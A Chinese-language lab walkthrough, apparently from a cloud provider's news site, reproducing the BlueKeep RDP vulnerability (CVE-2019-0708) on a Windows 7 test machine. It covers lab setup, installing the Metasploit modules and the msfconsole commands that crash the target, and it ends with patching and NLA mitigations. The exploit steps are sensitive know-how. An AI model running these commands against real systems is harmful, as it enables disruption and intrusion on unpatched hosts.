溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

發(fā)布時(shí)間:2021-12-28 17:52:20 來源:億速云 閱讀:324 作者:柒染 欄目:安全技術(shù)

本篇文章為大家展示了如何分析RDP終極EXP爆破漏洞CVE-2019-0708,內(nèi)容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細(xì)介紹希望你能有所收獲。

0x00 漏洞概述

CVE-2019-0708是微軟于2019年05月14日發(fā)布的一個(gè)嚴(yán)重的RDP遠(yuǎn)程代碼執(zhí)行漏洞。該漏洞無需身份認(rèn)證和用戶交互,可能形成蠕蟲爆發(fā),影響堪比wannycry。

2019年09月07日,@rapid7 在其metasploit-framework倉庫公開發(fā)布了CVE-2019-0708的利用模塊,漏洞利用工具已經(jīng)開始擴(kuò)散,已經(jīng)構(gòu)成了蠕蟲級的攻擊威脅。

0x01 影響版本

Windows 7

Windows Server 2008 R2

Windows Server 2008

Windows 2003

Windows XP

Windows 8和Windows 10及之后版本的用戶不受此漏洞影響

0x02 漏洞原理

由于對象指針在釋放后再次被使用而引發(fā)UAF漏洞,詳情見

https://www.anquanke.com/post/id/181577

0x03 環(huán)境搭建

環(huán)境準(zhǔn)備:

win7 sp1 - 192.168.152.139

Kali 2019.4 - 192.168.152.138

1.win7 sp1 準(zhǔn)備:

開啟3389:

打開控制面板,選擇系統(tǒng)和安全,選擇系統(tǒng),點(diǎn)擊遠(yuǎn)程設(shè)置,彈出系統(tǒng)屬性,點(diǎn)擊遠(yuǎn)程,在遠(yuǎn)程桌面上選擇允許運(yùn)行任意版本遠(yuǎn)程桌面的計(jì)算機(jī)連接(較不安全)。

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

2.Win+r,輸入cmd命令,輸入netstat -ano查看端口狀態(tài),可以看道3389狀態(tài)是listening。

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

3.修改注冊表:

Win + R 輸入 regedit 進(jìn)入注冊表編輯器,按以下目錄找到 fDisableCam 并將值改為0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control

\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

4.打開kali :

Kali2019版本的要下載需要的文件

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

可以看到有四個(gè).rb后綴的文件,接下來將它們放至相應(yīng)的目錄(rdp目錄需要自己創(chuàng)建)

rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rd

rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

5.查看文件是否復(fù)制成功

cd /usr/share/metasploit-framework/lib/msf/core/exploit/

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

cd /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

cd /usr/share/metasploit-framework/modules/exploit/windows/rdp/

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

0x04漏洞復(fù)現(xiàn)

1. 啟動(dòng)msf:

Msfconsole

2.重新加載所有模塊(重要):

命令:reload_all

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

3.搜索漏洞模塊

search 2019_0708

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //使用攻擊模塊

set rhosts 192.168.152.139 //設(shè)置目標(biāo)主機(jī)(win7 sp1)

set rport 3389 //設(shè)置目標(biāo)端口

set target 3

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

4.Run 執(zhí)行 win7 sp1藍(lán)屏

如何分析RDP終極EXP爆破漏洞CVE-2019-0708

0x05 漏洞修復(fù)

1.及時(shí)打?qū)?yīng)系統(tǒng)的安全補(bǔ)丁

2.關(guān)閉3389端口或添加防火墻安全策略限制對3389端口的訪問

3.打不了補(bǔ)丁的可以開啟遠(yuǎn)程桌面(網(wǎng)絡(luò)級別身份驗(yàn)證(NLA)),可以臨時(shí)防止漏洞攻擊

上述內(nèi)容就是如何分析RDP終極EXP爆破漏洞CVE-2019-0708,你們學(xué)到知識或技能了嗎?如果還想學(xué)到更多技能或者豐富自己的知識儲(chǔ)備,歡迎關(guān)注億速云行業(yè)資訊頻道。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI